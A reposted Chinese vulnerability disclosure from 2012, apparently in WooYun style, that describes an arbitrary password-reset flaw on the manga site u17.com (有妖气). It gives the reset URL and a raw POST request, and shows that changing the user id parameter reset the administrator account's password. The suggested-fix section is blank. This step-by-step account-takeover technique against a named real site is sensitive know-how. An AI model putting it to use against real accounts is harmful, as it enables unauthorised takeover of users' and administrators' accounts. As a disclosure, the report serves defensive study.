来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 盛大旗下有妖气漫画网任意用户密码修改今天这个站流量爆棚了.就检测了一下.庆祝10万个冷笑话第二集更新!详细说明:使用邮件找回密码处出现逻辑问题.使用一个已知帐号找回密码.得...
盛大旗下有妖气漫画网任意用户密码修改 使用一个已知帐号找回密码. 得到如下链接地址 http://passport.u17.com/member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 访问后如下图:
POST /member/reset_password.php?auth=70adcfad448d76c0b70480d787f734&id=2544380&t=1348903015 HTTP/1.1 new_password=zzzzzz&confirm_password=zzzzzz&%E6%8F%90%E4%BA%A4= cookies里并无任何与此操作相关的信息.post的数据中只提交了新密码.
此时对有妖气的管理员来一次密码修改.
您的账户名x*******9
然后使用次帐号尝试..存在这个帐号... 修改用户ID为1的密码.
管理员帐号. 尝试了下论坛.此帐号在论坛ID也是1.但由于论坛的后台设置了访问权限.403了... 非常喜欢有妖气的动漫.管理员xcily也是个技术宅.希望有机会能一起交流一下. 庆祝十万个冷笑话更新第二集!!! 修复方案: |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com